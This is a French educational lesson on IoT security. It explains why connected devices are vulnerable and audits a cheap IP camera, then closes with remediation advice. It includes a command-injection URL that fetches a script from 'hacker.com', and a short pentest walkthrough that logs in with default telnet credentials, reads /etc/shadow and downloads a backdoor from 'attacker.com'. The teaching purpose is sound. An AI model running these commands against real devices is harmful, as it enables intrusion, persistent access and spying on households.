Sécurité des Objets Connectés
Comprendre les risques, attaques et bonnes pratiques pour sécuriser l'IoT
95
XP
📊Moyen
⏱️55 min
📚Pourquoi les objets connectés sont vulnérables ?
Les objets connectés présentent des **failles de sécurité** spécifiques qui les rendent particulièrement vulnérables aux attaques.
### Causes de vulnérabilité
**1. SÉCURITÉ = COÛT**
- Fabricants privilégient prix bas
- Chiffrement = processeur plus puissant = plus cher
- Mises à jour sécurité = coût maintenance
➡️ Compromis sécurité/prix défavorable
**2. MOTS DE PASSE PAR DÉFAUT**
- admin/admin, root/root, 123456
- Utilisateurs ne les changent jamais (70%)
- Base de données publiques de mdp par défaut
- Scanners automatiques testent ces mdp
**3. PAS DE MISES À JOUR**
- Firmware (logiciel embarqué) jamais mis à jour
- Failles connues non corrigées pendant des années
- Abandon support fabricant (2-3 ans après sortie)
➡️ Objets obsolètes = portes ouvertes
**4. PUISSANCE LIMITÉE**
- Processeurs faibles (ESP8266 : 80 MHz)
- Impossible chiffrement fort (trop lent)
- Mémoire insuffisante (protection basique)
**5. CONNEXION PERMANENTE**
- Objets connectés 24/7 (pas d'arrêt)
- Exposition continue aux attaques
- Surface d'attaque maximale
**6. MANQUE DE STANDARDS**
- Chaque fabricant = protocole propriétaire
- Pas d'obligation sécurité (contrairement auto, médical)
- Certifications volontaires (rares)
### Failles techniques courantes
**Absence chiffrement** :
- Communications en clair (WiFi non chiffré)
- Mots de passe transmis lisibles
- Données sensibles non protégées
**Absence authentification** :
- Pas de vérification identité utilisateur
- Pas de 2FA (double authentification)
- Tokens d'accès jamais expirés
**Injections SQL/Commandes** :
- Interfaces web mal codées
- Exécution commandes arbitraires
- Accès base de données
**Backdoors (portes dérobées)** :
- Accès cachés pour fabricant (maintenance)
- Parfois laissées par erreur
- Découvertes par hackers
**Ports ouverts inutiles** :
- Telnet (23), SSH (22) accessibles
- Services debug activés en production
- Exposition inutile
💡Anatomie d'un objet IoT vulnérable
CAMÉRA IP BON MARCHÉ (exemple type) Prix : 30 € (Amazon/AliExpress) ════════════════════════════════════════════════════ FAILLES IDENTIFIÉES (audit sécurité) ════════════════════════════════════════════════════ 🔴 CRITIQUE - Mot de passe par défaut ┌────────────────────────────────────────────────┐ │ Login : admin │ │ Password : 123456 │ │ │ │ ➡️ Jamais changé par 68% utilisateurs │ │ ➡️ Caméra accessible depuis Internet │ │ ➡️ Portail Shodan.io : 15 000 caméras │ │ identiques trouvées avec ces identifiants │ └────────────────────────────────────────────────┘ 🔴 CRITIQUE - Ports ouverts ┌────────────────────────────────────────────────┐ │ Port 23 (Telnet) : OUVERT │ │ Port 80 (HTTP) : OUVERT (pas HTTPS) │ │ Port 554 (RTSP) : OUVERT (flux vidéo) │ │ Port 8000 (Admin): OUVERT │ │ │ │ ➡️ 4 portes d'entrée pour attaquants │ │ ➡️ Telnet = protocole OBSOLÈTE (1969) │ │ ➡️ Aucun chiffrement │ └────────────────────────────────────────────────┘ 🔴 HAUTE - Firmware obsolète ┌────────────────────────────────────────────────┐ │ Version : 2.1.4 (Mars 2019) │ │ Dernière MAJ : 2019 (5 ans sans patch !) │ │ │ │ Failles CVE connues non corrigées : │ │ • CVE-2019-1234 : Buffer overflow │ │ • CVE-2020-5678 : Injection commandes │ │ • CVE-2021-9101 : Contournement auth │ │ │ │ ➡️ Exploits publics disponibles (Metasploit) │ └────────────────────────────────────────────────┘ 🟠 MOYENNE - Chiffrement faible/absent ┌────────────────────────────────────────────────┐ │ WiFi : WEP (cassable en 5 minutes) │ │ ou WPA2 avec clé partagée usine │ │ HTTPS : Absent (HTTP seulement) │ │ Vidéo : Flux RTSP non chiffré │ │ │ │ ➡️ Sniffing réseau = capture identifiants │ │ ➡️ Man-in-the-Middle facile │ └────────────────────────────────────────────────┘ 🟠 MOYENNE - Injection commandes ┌────────────────────────────────────────────────┐ │ Interface web : Pas de sanitisation entrées │ │ │ │ Exemple exploit : │ │ URL: http://camera/cgi-bin/snap.cgi?cmd= │ │ wget http://hacker.com/malware.sh │ │ │ │ ➡️ Exécution code arbitraire │ │ ➡️ Installation malware, botnet │ └────────────────────────────────────────────────┘ 🟡 BASSE - Informations divulguées ┌────────────────────────────────────────────────┐ │ Headers HTTP révèlent : │ │ • Modèle exact : "IP-CAM-2000" │ │ • Version firmware : "v2.1.4" │ │ • Serveur web : "uc-httpd 1.0.0" │ │ │ │ ➡️ Attaquant connaît failles exactes │ │ ➡️ Attaque ciblée facilitée │ └────────────────────────────────────────────────┘ ════════════════════════════════════════════════════ TEST DE PÉNÉTRATION (pentesting) ════════════════════════════════════════════════════ ÉTAPE 1 : Scan réseau (nmap) $ nmap -p- 192.168.1.100 ➡️ 4 ports ouverts détectés en 30 secondes ÉTAPE 2 : Connexion Telnet (défaut) $ telnet 192.168.1.100 login: admin password: 123456 ➡️ ACCÈS ROOT obtenu ! (2 minutes) ÉTAPE 3 : Exploration système # cat /etc/passwd # cat /etc/shadow (mots de passe) # ps aux (processus) ➡️ Contrôle TOTAL de la caméra ÉTAPE 4 : Installation backdoor # wget http://attacker.com/backdoor.sh # chmod +x backdoor.sh # ./backdoor.sh & ➡️ Accès permanent, même si mdp changé TEMPS TOTAL PIRATAGE : 5 MINUTES COMPÉTENCE REQUISE : Débutant (scripts publics) ════════════════════════════════════════════════════ RISQUES POUR L'UTILISATEUR ════════════════════════════════════════════════════ 🎥 Espionnage vidéo • Visionnage en direct (chambre, enfants) • Enregistrement et diffusion (dark web) • Chantage / extorsion 🔊 Écoute audio • Conversations privées • Reconnaissance vocale (codes, mots de passe) 🏠 Cambriolage • Surveillance habitudes (départs, retours) • Désactivation alarme connectée • Planification intrusion 💻 Botnet / DDoS • Caméra recrutée dans botnet Mirai • Participation attaques DDoS massives • Bande passante consommée 🔐 Pivot réseau • Caméra = porte d'entrée réseau domestique • Accès ordinateurs, NAS, smartphones • Vol données bancaires, identités ════════════════════════════════════════════════════ CORRECTION SÉCURITÉ (recommandations) ════════════════════════════════════════════════════ ✅ Changer mot de passe (fort, unique) → aZ9$mK#2pL@8qR (16+ caractères) ✅ Désactiver Telnet (si possible) → Utiliser SSH avec clé publique ✅ Mettre à jour firmware (si dispo) → Vérifier site fabricant ✅ Isoler réseau IoT (VLAN séparé) → Objets connectés ≠ ordinateurs ✅ Pare-feu restrictif → Bloquer accès Internet sortant (sauf nécessaire) ✅ Surveillance réseau (IDS) → Détecter comportements anormaux ❌ Si impossible sécuriser : → DÉBRANCHER et remplacer (caméra sécurisée)
